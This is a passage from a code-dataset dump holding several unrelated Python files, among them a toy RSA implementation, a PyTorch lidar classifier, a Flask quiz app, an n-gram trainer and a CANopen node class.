Algoritmo de Miller-Rabin.\n O parâmetro k corresponde à acurácia do teste.\"\"\"\n\n assert n >= 1\n if n == 1:\n return False\n if n == 2 or n == 3:\n return True\n \n # escrever n-1 com d*(2^s), onde d é ímpar\n s, d = 0, n-1\n while d % 2 == 0:\n s, d = s + 1, d // 2\n assert (2 ** s) * d == n-1 and d % 2 == 1\n\n for i in range(k):\n a = randrange(2, n-1)\n x = modular_pow(a, d, n)\n if x == 1 or x == n-1:\n continue\n for r in range(1, s):\n x = (x * x) % n\n if x == 1:\n return False\n if x == n-1:\n break\n else:\n return False\n \n return True\n\ndef random_prime(lower, upper):\n \"\"\"Retorna um número primo no intervalo [lower, upper).\"\"\"\n p = 1\n while not is_prime(p):\n p = randrange(lower, upper)\n return p\n\n# http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm\ndef multiplicative_inverse(a, mod):\n \"\"\"Retorna o inverso multiplicativo de a no módulo mod.\n É necessário que a e mod sejam primos entre si.\"\"\"\n assert gcd(a, mod) == 1\n\n x0, x1 = 0, 1\n r0, r1 = mod, a\n\n while r1 != 0:\n q = r0 // r1\n x0, x1 = x1, x0 - q * x1\n r0, r1 = r1, r0 - q * r1\n \n if x0 < 0:\n x0 += mod\n\n assert (x0 * a) % mod == 1\n\n return x0\n\ndef generate_keys(verbose=False):\n \"\"\"Gera chaves pública e secreta de acordo com o algoritmo RSA.\n Caso verbose seja verdadeiro, imprime parâmetros do algoritmo no console.\"\"\"\n\n p = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n while q == p:\n q = random_prime(PRIME_LOWER_BOUND, PRIME_UPPER_BOUND)\n n = p * q\n phi = (p - 1) * (q - 1)\n\n e = randrange(phi)\n while gcd(e, phi) != 1:\n e = randrange(phi)\n\n d = multiplicative_inverse(e, phi)\n \n if verbose == True:\n print(\"p = %d\" % p)\n print(\"q = %d\" % q)\n print(\"n = %d\" % n)\n print(\"phi = %d\" % phi)\n print(\"e = %d\" % e)\n print(\"d = %d\" % d)\n\n return KeyPair(public=Key(e, n), private=Key(d, n))\n\ndef encrypt(message, public_key):\n \"\"\"Encripta uma string mensagem aplicando uma chave pública RSA.\"\"\"\n chunk_size = int(log(public_key.mod, 256))\n binary_message = b64encode(message.encode())\n result = []\n \n for i in range(0, len(binary_message), chunk_size):\n chunk = binary_message[i:i+chunk_size]\n plain = 0\n for byte in reversed(chunk):\n plain *= 256\n plain += byte\n coded = modular_pow(plain, public_key.exp, public_key.mod)\n result.append(hex(coded)[2:])\n return \":\".join(result)\n\ndef decrypt(cypher, private_key):\n \"\"\"Decripta um código aplicando uma chave privada RSA.\"\"\"\n result = []\n for chunk in cypher.split(\":\"):\n coded = int(chunk, 16)\n plain = modular_pow(coded, private_key.exp, private_key.mod)\n result.append(plain % 256)\n while plain > 0:\n plain = plain // 256\n result.append(plain % 256)\n return b64decode(bytes(result)).decode()\n\ndef main():\n keys = generate_keys(True)\n print()\n\n print(\"Public key =\", keys.public)\n print(\"Private key =\", keys.private)\n print()\n\n message = \"Isto é uma mensagem em português. 
àÀáÁãÃçÇéÉêÊÍíóÓúÚüÜ\"\n print(\"message = \\\"%s\\\"\" % message)\n print()\n\n cypher = encrypt(message, keys.public)\n print(\"cypher =\", cypher)\n print()\n\n decrypted = decrypt(cypher, keys.private)\n print(\"decrypted = \\\"%s\\\"\" % decrypted)\n print()\n\n assert message == decrypted\n\nif __name__ == '__main__':\n main()","sub_path":"rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"79137217","text":"import unittest\nfrom ctci.c2.p21 import dedups\nfrom ds.linkedlist import LinkedListNode\n\nclass TestDedups(unittest.TestCase):\n\n def test_dedups_none(self):\n head = None\n dedups(head)\n self.assertTrue(head is None)\n\n def test_dedups_one(self):\n head = LinkedListNode(0, None)\n dedups(head)\n self.assertTrue(head.next is None)\n\n","sub_path":"ctci/c2/test_p21.py","file_name":"test_p21.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"16902107","text":"# -*- coding: utf-8 -*-\n\nimport time\n\ndef main():\n i = 0\n while i <= 10000:\n print (i)\n i += 1\n\nif __name__ == \"__main__\":\n \n #簡単に処理時間を計測してみる\n start = time.time()\n \n main()\n\n elapsedTime = time.time() - start\n\n print(\"処理速度:{0}\".format(elapsedTime))\n","sub_path":"Other/elapsed_time.py","file_name":"elapsed_time.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"402449910","text":"import os\r\nimport shutil\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nfrom torchvision import datasets, transforms\r\nfrom torch.optim.lr_scheduler import StepLR\r\nimport subprocess\r\nfrom pathlib import Path\r\nimport random\r\n\r\nclass Net(nn.Module):\r\n def __init__(self):\r\n super(Net, self).__init__()\r\n \r\n #1 input image channel, 32 output channel, 3*3 square convolution kernel\r\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\r\n \r\n #32 input channels,64 output channedl, 3*3 square convolution kernel\r\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\r\n \r\n #nn.Dropout2d() will help promote independence between feature maps and should be used instead.\r\n #torch.nn.Dropout2d\r\n self.dropout1 = nn.Dropout2d(0.25)\r\n self.dropout2 = nn.Dropout2d(0.5)\r\n \r\n #apply a linear transformation to the incoming data:y=xA+b,torch.nn.Linear(in_features: int, out_features: int, bias: bool = True)\r\n self.fc1 = nn.Linear(12544, 128)\r\n self.fc2 = nn.Linear(128, 2)\r\n\r\n def forward(self, x):\r\n x = self.conv1(x)\r\n #print(\"Size after conv1:\",x.size())\r\n x = F.relu(x)\r\n x = self.conv2(x)\r\n x = F.relu(x)\r\n #print(\"Size after cov2:\",x.size())\r\n x = F.max_pool2d(x, 2)\r\n\r\n #print(\"Size after pooling:\",x.size())\r\n x = self.dropout1(x)\r\n \r\n #Flattens a contiguous range of dims in a tensor\r\n x = torch.flatten(x, 1)\r\n #print(\"Size after flattern:\", x.size())\r\n \r\n x = self.fc1(x)\r\n x = F.relu(x)\r\n x = self.dropout2(x)\r\n x = self.fc2(x)\r\n output = F.log_softmax(x, dim=1)\r\n return output\r\n\r\ndef select_train_images(ins_list,em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_train_data/class_A',cr_destination='lidar_train_data/class_B'):\r\n num_cr=0\r\n num_em=0\r\n for ins in ins_list:\r\n if ins['cr']==\"crowded\":\r\n num_cr+=1\r\n elif 
ins['cr']==\"empty\":\r\n num_em+=1\r\n \r\n cr_image_list=os.listdir(cr_data_path)\r\n #print(cr_image_list)\r\n selected_cr_image_list=random.sample(cr_image_list,k=num_cr)\r\n \r\n em_image_list=os.listdir(em_data_path)\r\n #print(em_image_list)\r\n selected_em_image_list=random.sample(em_image_list,k=num_em)\r\n \r\n for f1 in selected_cr_image_list:\r\n shutil.copy(cr_data_path+\"/\"+f1,cr_destination)\r\n for f2 in selected_em_image_list:\r\n shutil.copy(em_data_path+\"/\"+f2,em_destination)\r\n \r\n print(\"Lidar train data is generated\")\r\n \r\ndef select_test_images(em_data_path='lidar_converted_data/class_A',cr_data_path=\"lidar_converted_data/class_B\",em_destination='lidar_test_data/class_A',cr_destination='lidar_test_data/class_B'):\r\n cr_image_list=os.listdir(cr_data_path)\r\n em_image_list=os.listdir(em_data_path)\r\n selected_em_image_list=random.sample(em_image_list,k=50)\r\n selected_cr_image_list=random.sample(cr_image_list,k=50)\r\n \r\n for f1 in selected_em_image_list:\r\n shutil.move(em_data_path+\"/\"+f1,em_destination)\r\n \r\n for f2 in selected_cr_image_list:\r\n shutil.move(cr_data_path+\"/\"+f2,cr_destination)\r\n\r\n print(\"Lidar test data is generated\")\r\n\r\ndef delete_train_images():\r\n shutil.rmtree(\"lidar_train_data/class_A\")\r\n shutil.rmtree(\"lidar_train_data/class_B\")\r\n os.makedirs(\"lidar_train_data/class_A\")\r\n os.makedirs(\"lidar_train_data/class_B\")\r\n \r\ndef delete_test_images():\r\n shutil.rmtree(\"lidar_test_data/class_A\")\r\n shutil.rmtree(\"lidar_test_data/class_B\")\r\n os.makedirs(\"lidar_test_data/class_A\")\r\n os.makedirs(\"lidar_test_data/class_B\")\r\n","sub_path":"perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"425748924","text":"import random\r\nimport os\r\nimport datetime\r\nimport json\r\nfrom flask import Flask,request,render_template,Response\r\n\r\n\r\napp = Flask(__name__)\r\n\r\ndatamain = {}\r\n\r\nclass session:\r\n def __init__(self,name):\r\n self.jsonfile = os.getcwd()\r\n self.time = datetime.datetime.now()\r\n self.quest = []\r\n self.answer = []\r\n self.useranswers = []\r\n self.stage = 0\r\n if os.path.exists(self.jsonfile + '/baza/' + name + \".json\"):\r\n with open(self.jsonfile + '/baza/' + name + \".json\",'r') as js:\r\n mainj = json.load(js)\r\n else:\r\n data = {\"id\": name, \"rightanswers\": 0}\r\n with open(self.jsonfile + '/baza/' + name + \".json\", 'w', encoding='UTF-8') as js:\r\n json.dump(data, js, ensure_ascii=False)\r\n self.questgenerate()\r\n\r\n def endthis(self):\r\n result = \"\"\r\n for a in range(5):\r\n if self.answer[a] == self.useranswers[a]:\r\n result += \"
\" + str((a+1)) + \". Дан правильный ответ. \"\r\n else:\r\n result += \"
\" + str((a+1)) + \". Дан неправильный ответ. \" + str(self.answer[a])\r\n return result\r\n\r\n def questgenerate(self):\r\n bignumbs = random.randint(10, 32) * 100000\r\n\r\n middlenumbs = random.randint(16, 30) * 1000\r\n smallnumbs = random.randint(120, 1000)\r\n tinynumbs = random.randint(4, 12)\r\n print(bignumbs,middlenumbs,smallnumbs,tinynumbs)\r\n t = random.sample(range(1,6), 5)\r\n with open(\"quest.json\") as js:\r\n quests = json.load(js)\r\n for a in range(0,5):\r\n print(t)\r\n self.quest.append(quests[\"q\" + str(t[a])])\r\n if t[a] == 1:\r\n self.answer.append(round((middlenumbs + middlenumbs*4/5 + middlenumbs/2 + middlenumbs/4),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(middlenumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(middlenumbs/2))\r\n elif t[a] == 2:\r\n self.answer.append(round((middlenumbs * 1.2 / ((tinynumbs + 3 )/100)*12 / (tinynumbs - 2)),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(tinynumbs - 2))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(tinynumbs + 3))\r\n self.quest[a] = self.quest[a].replace(\"*2%\", str(middlenumbs * 1.2))\r\n elif t[a] == 3:\r\n self.answer.append(round((((round(bignumbs * random.uniform(1,1.5))) / bignumbs-1)/4*100),2))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(bignumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(round(bignumbs * random.uniform(1,1.5))))\r\n print((bignumbs * 1.3 / bignumbs-1)/4*100)\r\n print(bignumbs)\r\n print(bignumbs)\r\n elif t[a] == 4:\r\n self.answer.append(round((smallnumbs * 1.5 - smallnumbs),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(smallnumbs))\r\n self.quest[a] = self.quest[a].replace(\"*1%\", str(smallnumbs * 1.5))\r\n elif t[a] == 5:\r\n self.answer.append(round((bignumbs *0.1 + bignumbs),1))\r\n self.quest[a] = self.quest[a].replace(\"*%\",str(bignumbs))\r\n\r\n\r\n\r\n\r\n@app.route('/res',methods=['GET'])\r\ndef hello_wor():\r\n nameandf = request.args.get('name')\r\n id = request.args.get('id')\r\n results = request.args.get('tasks')\r\n print(results)\r\n return render_template('ind.html',results = results)\r\n\r\n\r\n@app.route('/f',methods=['GET'])\r\ndef hello_worl():\r\n nameandf = request.args.get('name')\r\n id = request.args.get('id')\r\n return render_template('inde.html',name=nameandf,id = id,val1=random.randint(16000, 30000),val2 = random.randint(4, 12),val3 = random.randint(1000000, 3200000),val4 = random.randint(120, 1000),val5 = random.randint(100000, 500000))\r\n\r\n@app.route('/',methods=['GET','POST'])\r\ndef hello_world():\r\n if request.method == 'GET':\r\n return render_template('inde.html')\r\n else:\r\n data = request.get_json()\r\n if data[\"type\"] == 'e':\r\n if data[\"name\"] in datamain:\r\n if datamain[data[\"name\"]].stage == 0:\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n else:\r\n datamain[data['name']] = session(data['name'])\r\n datamain[data[\"name\"]].stage+=1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n elif data['type'] == 'r':\r\n datamain[data[\"name\"]].useranswers.append(data[\"answ\"])\r\n if(datamain[data[\"name\"]].stage != 5):\r\n datamain[data[\"name\"]].stage += 1\r\n dat = datamain[data[\"name\"]].quest[datamain[data[\"name\"]].stage] + \"

\"\r\n else:\r\n dat = datamain[data[\"name\"]].endthis()\r\n print(dat)\r\n return Response(response=dat, status=200, mimetype=\"text / plain\", content_type='text/event-stream')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n #if request.method == 'GET':\r\n # print(request.args)\r\n #return render_template('index.html')\r\n","sub_path":"FuckYou.py","file_name":"FuckYou.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271133869","text":"import config\nimport logging\nimport requests\n\nTREESTATUS_URL = 'https://treestatus.mozilla-releng.net/trees/'\n\nlogger = logging.getLogger('autoland')\n\n\ndef tree_is_open(tree):\n # treestatus running in dev/CI is an older version, with slightly\n # different request and response structures.\n is_test_env = config.testing()\n\n r = None\n try:\n if is_test_env:\n r = requests.get('http://treestatus/%s?format=json' % tree)\n else:\n r = requests.get(TREESTATUS_URL + tree)\n\n if r.status_code == 200:\n if is_test_env:\n return r.json()['status'] == 'open'\n else:\n return r.json()['result']['status'] == 'open'\n\n elif r.status_code == 404:\n # We assume unrecognized trees are open\n return True\n\n else:\n logger.error('Unexpected response from treestatus API '\n 'for tree \"%s\": %s' % (tree, r.status_code))\n except KeyError:\n logger.error('Malformed response from treestatus API '\n 'for tree \"%s\"' % tree)\n if r is not None:\n logger.debug(r.json())\n except Exception as e:\n logger.error('Failed to determine treestatus for %s: %s' % (tree, e))\n\n return False\n\n","sub_path":"autoland/autoland/treestatus.py","file_name":"treestatus.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101876903","text":"T=10\nfor tc in range(T):\n num=int(input())\n exp=input()\n postfix=[]\n op=[]\n for i in exp:\n if i=='(':\n op.append(i)\n elif i==')':\n while op:\n if op[-1]=='(':\n op.pop()\n break\n postfix.append(op.pop())\n elif i=='+':\n if op and op[-1]=='*':\n while op:\n if op[-1]=='(':\n break\n postfix.append(op.pop())\n op.append(i)\n elif i=='*':\n op.append(i)\n else:\n postfix.append(i)\n while op:\n postfix.append(op.pop())\n stack=[]\n for i in postfix:\n if i=='*':\n stack.append(stack.pop()*stack.pop())\n elif i=='+':\n stack.append(stack.pop() + stack.pop())\n else:\n stack.append(int(i))\n print(f'#{tc+1} {stack[0]}')","sub_path":"1224.py","file_name":"1224.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"380569203","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 29 05:29:37 2021\n\n@author: lindemberg\n\"\"\"\n\nimport requests\nimport json \n\ndef formata_dados(dados_paises):\n sigla = \"\"\n pais = \"\"\n fronteiras = []\n dados_formatado = \"SIGLA | PAÍS\"+(16* \" \") + \"| FRONTEIRAS\\n\" \n \n for dados in dados_paises:\n sigla = dados[\"code\"]\n pais = dados[\"name\"]\n fronteiras = dados[\"fronteiras\"]\n dados_formatado += sigla +\" | \" + pais + (20-len(pais)) * \" \" + \"| \" + str(fronteiras) + \" - (\" + str(len(fronteiras)) +\" país(es) faz(em) fronteira)\\n\" \n \n return dados_formatado \n\ndef ordena_decrescente(dados_paises):\n for i in range(len(dados_paises)-1):\n for j in range(i+1,len(dados_paises)):\n if len(dados_paises[i][\"fronteiras\"]) < 
len(dados_paises[j][\"fronteiras\"]):\n dados_paises[i] , dados_paises[j] = dados_paises[j] , dados_paises[i]\n \n# captura os dados da API, seguido da lista de dados dos paises do tipo dicionário(dict)\ndados_paises = requests.get(\"http://www.amock.io/api/fcmaia/countries\")\nlista_de_dic_paises = json.loads(dados_paises.content)\n\n#mostra como os dados foram capturados sem uma ordenação \nprint(\"SEQUENCIA FORMATADA DOS DADOS CONFORME CAPTURADO DA API\")\nprint(formata_dados(lista_de_dic_paises))\n\n#realiza a ordenação em ordem descrescente, levando em consideração a quantidade de fronteiras que cada país tem\nordena_decrescente(lista_de_dic_paises)\n\n#mostra a lista ordenada \nprint(\"SEQUENCIA ORDENADA, CONFORME A QUANTIDADE DE FRONTEIRAS\")\nprint(formata_dados(lista_de_dic_paises))","sub_path":"fronteira.py","file_name":"fronteira.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"635505048","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Class, designed to search for sources.\n\"\"\"\n# built-ins\nimport os\nfrom pathlib import Path\nfrom typing import List, Optional, Generator, Tuple, Dict\n\n# modules of the project\nfrom essence.machine import settings\nfrom essence.machine.model.utils import find_metafiles, load_as_json, get_file_extension\nfrom essence.utils import exceptions\nfrom essence.utils.containeer_abstract import ContainerAbstract\nfrom essence.utils.common import s_type, decorate\nfrom essence.utils.helpers import Meta, Uri\n\nMetas = Dict[Uri, Meta]\n\n\nclass Locator(ContainerAbstract):\n \"\"\"Class, designed to search for sources.\n \"\"\"\n FILE_TYPE = 'yml'\n _bound_type = Meta\n _raise_on_absence = exceptions.MetaDoesNotExistError\n _raise_on_overwrite = exceptions.MetaAlreadyExistError\n\n def __init__(self, metas: Optional[Metas] = None) -> None:\n \"\"\"Instantiate.\n \"\"\"\n self._storage: Metas = metas or {}\n\n def __repr__(self) -> str:\n \"\"\"Return string representation.\n \"\"\"\n return s_type(self) + f'({self.FILE_TYPE})'\n\n def discover(self, path: Optional[Path] = None) -> None:\n \"\"\"Find and save meta instances for all metafiles.\n \"\"\"\n for meta in self.search_metafiles(path):\n self.add(meta)\n\n if not self:\n raise exceptions.NoStoriesFoundError(decorate(\n f'Not a single story has been found!'\n ))\n\n def search_metafiles(self, path: Optional[Path] = None) -> Generator[Meta, None, None]:\n \"\"\"Get metas for all folders with stories in them.\n \"\"\"\n metafiles = find_metafiles(path)\n\n for filename in metafiles:\n contents = load_as_json(filename)\n # noinspection PyArgumentList\n meta = self._bound_type(**contents, uri=filename.parent.name, path=filename)\n yield meta\n\n # pylint: disable=W0221\n def iterate_over_content(self, story_name: str) -> Generator[Tuple[str, Path], None, None]:\n \"\"\"Iterate over all filenames.\n \"\"\"\n for meta in self.values():\n if meta.uri != story_name:\n continue\n\n base_path = meta.path.parent\n\n for path, _, files in os.walk(str(base_path.absolute())):\n for file in files:\n full_path = Path(path) / file.lower()\n if (file != settings.META_FILE_NAME and\n get_file_extension(full_path) == self.FILE_TYPE):\n yield self.FILE_TYPE, full_path\n\n def get_stories(self) -> List[Tuple[str, str]]:\n \"\"\"Get uris and names for all known stories.\n \"\"\"\n titles = [(x.uri, x.name) for x in self.values()]\n return 
titles\n","sub_path":"essence/machine/model/locator.py","file_name":"locator.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"14599343","text":"import re\nimport sys\nfrom .common_errors import CommonErrors\nfrom .corpora import OANCCorpus, TestCorpus\nfrom .serial import Cereal\n\n\nclass Trainer:\n def __init__(self, reduced=True, corpus=OANCCorpus, corrections=True, serializer=Cereal):\n if corrections:\n self.corpus = corpus(errors=CommonErrors)\n else:\n self.corpus = corpus()\n self.reduced = reduced\n self.serializer = serializer()\n self.data = {}\n self.unigrams_list = []\n self.bigrams_list = []\n self.trigrams_list = []\n self.read_corpus()\n self.train()\n\n def read_corpus(self):\n for line in self.corpus.read_corpus():\n self.unigrams_list += self.words(line)\n self.bigrams_list += self.bigrams(line)\n self.trigrams_list += self.trigrams(line)\n\n def train(self):\n unigram_count = self.train_model(self.unigrams_list)\n bigram_count = self.train_model(self.bigrams_list)\n trigram_count = self.train_model(self.trigrams_list)\n if self.reduced:\n unigram_count = self.reduce(unigram_count)\n bigram_count = self.reduce(bigram_count)\n trigram_count = self.reduce(trigram_count)\n unigram_probs = self.get_probs(unigram_count)\n bigram_probs = self.get_probs(bigram_count)\n trigram_probs = self.get_probs(trigram_count)\n self.norm(unigram_probs)\n self.norm(bigram_probs)\n self.norm(trigram_probs)\n self.data['unigram_count'] = unigram_count\n self.data['unigram_probs'] = unigram_probs\n self.data['bigram_probs'] = bigram_probs\n self.data['trigram_probs'] = trigram_probs\n\n def reduce(self, count):\n new_count = {}\n for key, value in count.items():\n if value > 1:\n new_count[key] = value\n return new_count\n\n def pickle(self):\n name = self.corpus.name\n self.serializer.serialize(name, self.data)\n\n def norm(self, probs):\n pmax = max(probs.values())\n pmin = min(probs.values())\n denom = pmax - pmin\n if denom == 0:\n denom = 1\n for key, value in probs.items():\n probs[key] = ((value - pmin) / denom)\n\n def get_probs(self, count):\n prob_dict = {}\n denom = sum(count.values())\n for gram in count:\n prob_dict[gram] = (count[gram] / denom)\n return prob_dict\n\n def bigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 1):\n l.append((mod_line[i], mod_line[i + 1]))\n return l\n\n def trigrams(self, text):\n l = []\n lines = filter(None, re.split('[.?!\\n]+', text))\n for line in lines:\n mod_line = [\"^\"] + self.words(line) + [\"$\"]\n for i in range(len(mod_line) - 2):\n l.append((mod_line[i], mod_line[i + 1], mod_line[i + 2]))\n return l\n\n def words(self, text):\n l = re.findall('[a-z\\']+', text.lower())\n return l\n\n def train_model(self, features):\n model = {}\n for f in features:\n if f in model:\n model[f] += 1\n else:\n model[f] = 1\n return model\n\n\ndef whathappened(time, unis, bis, tris):\n print(\"Took: \" + str(time) + \" seconds\")\n print(\"Added: \" + str(unis) + \" unigrams\")\n print(\"Added: \" + str(bis) + \" bigrams\")\n print(\"Added: \" + str(tris) + \" trigrams\")\n\nif __name__ == \"__main__\":\n import time\n corpus = OANCCorpus\n corrections = CommonErrors\n reduced = True\n if 'test' in sys.argv:\n corpus = TestCorpus\n corrections = None\n reduced = False\n start = time.clock()\n t = 
Trainer(corrections=corrections, corpus=corpus, reduced=reduced)\n t.pickle()\n end = time.clock() - start\n unis = len(t.data['unigram_probs'].keys())\n bis = len(t.data['bigram_probs'].keys())\n tris = len(t.data['trigram_probs'].keys())\n whathappened(end, unis, bis, tris)\n","sub_path":"app/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"191609057","text":"import matplotlib.pyplot as plt\n\n# set up x values and y values\n\nx_values = list(range(5000))\ny_values = [x**3 for x in x_values]\n\n# set the title of the plot\nplt.title('Cubic Values', fontsize=15)\n\n# set the axes of the plot\nplt.xlabel('Values', fontsize=10)\nplt.ylabel('Cubic Values', fontsize=10)\n\n# set the scale\nplt.tick_params(axis='both', which='major', labelsize=5)\n# draw the plot\nplt.scatter(x_values, y_values, c=y_values, cmap=plt.cm.Reds, s=20)\nplt.show()\n\n\n\n","sub_path":"practice/15.02_cubic_diagram.py","file_name":"15.02_cubic_diagram.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163274178","text":"#!/usr/bin/python\nimport fresh_tomatoes\nimport media\n\n\ndef main():\n shawshank = media.Movie(\"The Shawshank Redemption\",\n \"An innocent man escapes from prison.\",\n 1994,\n \"http://ia.media-imdb.com/images/M/MV5BODU4MjU4N\" +\n \"jIwNl5BMl5BanBnXkFtZTgwMDU2MjEyMDE@._V1_SX214_A\" +\n \"L_.jpg\",\n \"https://www.youtube.com/watch?v=6hB3S9bIaco\",\n 9.3)\n\n love_actually = media.Movie(\"Love Actually\",\n \"Intertangled romance ensues over Christmas.\",\n 2003,\n \"http://ia.media-imdb.com/images/M/MV5BMTY4N\" +\n \"jQ5NDc0Nl5BMl5BanBnXkFtZTYwNjk5NDM3._V1_SX2\" +\n \"14_AL_.jpg\",\n \"https://www.youtube.com/watch?v=KdzH6a-XEGM\",\n 7.7)\n\n wedding_crashers = media.Movie(\"Wedding Crashers\",\n \"Two guys crash weddings and fall in love.\",\n 2005,\n \"http://ia.media-imdb.com/images/M/MV5BM\" +\n \"Tc4NTUyNzU4MV5BMl5BanBnXkFtZTcwMzcyMTky\" +\n \"MQ@@._V1_SX214_AL_.jpg\",\n \"https://www.youtube.com/watch?v=VYrEQbt\" +\n \"V2V4\",\n 7.0)\n\n amelie = media.Movie(\"Amelie\",\n \"A young eccentric French girl tries to find the\" +\n \" origin of some mysterious photos.\",\n 2001,\n \"http://ia.media-imdb.com/images/M/MV5BMTYzNjkxMT\" +\n \"czOF5BMl5BanBnXkFtZTgwODg5NDc2MjE@._V1_SY317_CR0,0\" +\n \",214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=sECzJY07oK4\",\n 8.4)\n\n mohicans = media.Movie(\"The Last of the Mohicans\",\n \"An innocent man escapes from prison.\",\n 1992,\n \"http://ia.media-imdb.com/images/M/MV5BMTQ0MjQ5ND\" +\n \"AzMV5BMl5BanBnXkFtZTcwNjYzMjE2MQ@@._V1_SY317_CR8\" +\n \",0,214,317_AL_.jpg\",\n \"https://www.youtube.com/watch?v=yaQeVnN6pUc\",\n 7.8)\n\n once = media.Movie(\"Once\",\n \"Two buskers in Dublin are star-crossed.\",\n 2006,\n \"http://ia.media-imdb.com/images/M/MV5BMTEwNjExOTc2MT\" +\n \"JeQTJeQWpwZ15BbWU3MDYzODQ3NDE@._V1_SY317_CR0,0,214,3\" +\n \"17_AL_.jpg\",\n \"https://www.youtube.com/watch?v=FWJIylZ8VyM\",\n 7.9)\n\n my_faves = [shawshank, love_actually, wedding_crashers, amelie, mohicans,\n once]\n\n # Send my favorite movies to Fresh Tomatoes HTML generator\n fresh_tomatoes.open_movies_page(my_faves)\n\nif __name__ == '__main__':\n 
main()","sub_path":"entertainment_console.py","file_name":"entertainment_console.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"646283220","text":"from .sdo import SdoClient\nfrom .nmt import NmtMaster\nfrom .emcy import EmcyConsumer\nfrom .pdo import PdoNode\nfrom . import objectdictionary\n\n\nclass Node(object):\n \"\"\"A CANopen slave node.\n\n :param int node_id:\n Node ID (set to None or 0 if specified by object dictionary)\n :param object_dictionary:\n Object dictionary as either a path to a file, an ``ObjectDictionary``\n or a file like object.\n :type object_dictionary: :class:`str`, :class:`canopen.ObjectDictionary`\n \"\"\"\n\n def __init__(self, node_id, object_dictionary):\n self.network = None\n\n if not isinstance(object_dictionary,\n objectdictionary.ObjectDictionary):\n object_dictionary = objectdictionary.import_od(\n object_dictionary, node_id)\n self.object_dictionary = object_dictionary\n\n self.id = node_id or self.object_dictionary.node_id\n\n #: Enable WORKAROUND for reversed PDO mapping entries\n self.curtis_hack = False\n\n self.sdo = SdoClient(0x600 + self.id, 0x580 + self.id, object_dictionary)\n self.pdo = PdoNode(self)\n self.nmt = NmtMaster(self.id)\n self.emcy = EmcyConsumer()\n\n def associate_network(self, network):\n self.network = network\n self.sdo.network = network\n self.pdo.network = network\n self.nmt.network = network\n network.subscribe(self.sdo.tx_cobid, self.sdo.on_response)\n network.subscribe(0x700 + self.id, self.nmt.on_heartbeat)\n network.subscribe(0x80 + self.id, self.emcy.on_emcy)\n\n def remove_network(self):\n self.network.unsubscribe(self.sdo.tx_cobid)\n self.network.unsubscribe(0x700 + self.id)\n self.network.unsubscribe(0x80 + self.id)\n self.network = None\n self.sdo.network = None\n self.pdo.network = None\n self.nmt.network = None\n\n def store(self, subindex=1):\n \"\"\"Store parameters in non-volatile memory.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1010, subindex, b\"save\")\n\n def restore(self, subindex=1):\n \"\"\"Restore default parameters.\n\n :param int subindex:\n 1 = All parameters\\n\n 2 = Communication related parameters\\n\n 3 = Application related parameters\\n\n 4 - 127 = Manufacturer specific\n \"\"\"\n self.sdo.download(0x1011, subindex, 